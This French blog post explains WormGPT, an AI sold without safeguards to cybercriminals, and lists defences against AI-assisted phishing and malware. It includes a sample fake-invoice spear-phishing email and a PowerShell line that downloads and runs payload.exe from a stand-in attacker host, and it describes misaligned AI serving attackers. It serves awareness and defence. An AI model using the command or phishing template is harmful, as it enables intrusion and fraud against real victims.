WormGPT – IA qui aide les cybercriminels
Comment s’en protéger efficacement
L’intelligence artificielle ne sert pas qu’à écrire des poèmes ou coder des assistants vocaux… Elle peut aussi être détournée pour faire le mal. Et c’est là qu’intervient WormGPT, une IA redoutable conçue pour automatiser les cyberattaques. Dans cet article, je vous explique ce qu’est WormGPT, à quoi elle sert, des exemples réels d’usage, et surtout comment s’en prémunir en entreprise comme à la maison.
Qu’est-ce que WormGPT ?
WormGPT est une IA basée sur GPT-J, un modèle open-source de langage, mais débarrassée de toute limite éthique. Développée en 2023 par un hacker connu sous le pseudonyme “Last”, elle a été commercialisée sur des forums underground pour générer automatiquement :
- Des e-mails de phishing ultra convaincants,
- Des scripts PowerShell malveillants,
- Des payloads de ransomware,
- Des messages pour escroqueries BEC (Business Email Compromise).
Contrairement à ChatGPT, qui refuse de participer à des actions malveillantes, WormGPT a été conçue sans aucun garde-fou. Elle répond à toutes les requêtes, même les plus illégales.
Exemples concrets d’utilisation
Voici quelques cas d’usage identifiés dans les rapports de cybersécurité :
Génération d’e-mails de phishing ultra-ciblés (Spear Phishing)
Objet : Action requise - Facture impayée URGENTE Bonjour [Nom de l’employé], Veuillez trouver ci-joint la facture n°45602 en attente de règlement depuis le 4 juillet. En l'absence de paiement sous 24 heures, des frais supplémentaires s’appliqueront. Bien cordialement, Marie Delcourt Direction Financière
Ce type de message est généré avec un ton professionnel, une signature réaliste, et contient souvent une pièce jointe malveillante ou un lien vers un faux portail Microsoft.
Génération de code PowerShell pour ouvrir une backdoor
Invoke-WebRequest -Uri http://evil.example.com/payload.exe -OutFile $env:TEMP\payload.exe Start-Process $env:TEMP\payload.exe
Ce code, simple mais efficace, peut être injecté via une macro Excel, un mail HTML ou un script tiers.
Social engineering automatisé
WormGPT peut rédiger de faux CVs, des messages LinkedIn convaincants, voire des échanges fictifs pour gagner la confiance avant une attaque plus ciblée.
Contre-mesures à mettre en place
1. Sensibilisation des utilisateurs
- Former les employés à reconnaître un message anormal (ton, urgence, fautes…).
- Utiliser des campagnes de faux phishing pour entraîner les réflexes.
2. Vérifications techniques
- Implémenter DMARC / SPF / DKIM pour sécuriser l’envoi d’e-mails.
- Ajouter une bannière d’alerte sur les mails externes (« Cet email provient de l’extérieur de l’organisation »).
3. Surveillance comportementale
- Mettre en place des SIEM ou outils de détection comme CrowdStrike, Darktrace, Elastic SIEM pour détecter les comportements anormaux.
4. Solutions d’IA défensive
- L’IA n’est pas qu’un danger, elle peut aussi détecter les patterns malveillants.
- Ex : Microsoft Defender for Endpoint, SentinelOne, ou Proofpoint utilisent de l’IA pour stopper les menaces en amont.
5. Test de red teaming / pentest
- Faire auditer votre SI par des professionnels pour identifier les points faibles.
- Simuler des attaques BEC, spear-phishing ou malware via des outils légitimes comme GoPhish.
Où en est WormGPT aujourd’hui ?
WormGPT a été officiellement fermé en août 2023, mais de nouvelles variantes sont apparues en 2024–2025, s’appuyant sur les modèles Grok (d’xAI) ou Mixtral (de Mistral AI). Elles circulent sur Telegram ou les dark markets, à des prix allant jusqu’à 5 000 € pour une version hébergée localement.
Conclusion
WormGPT illustre une tendance inquiétante : celle de l’IA au service du cybercrime. Heureusement, il est possible de s’en défendre avec une bonne hygiène numérique, des outils adaptés et surtout une culture de la vigilance.
💡 Rappel : Ce n’est pas la technologie qui est dangereuse en soi, c’est ce qu’on en fait. Et chez moi, sur ce blog, on préfère s’en servir pour protéger, éduquer et anticiper.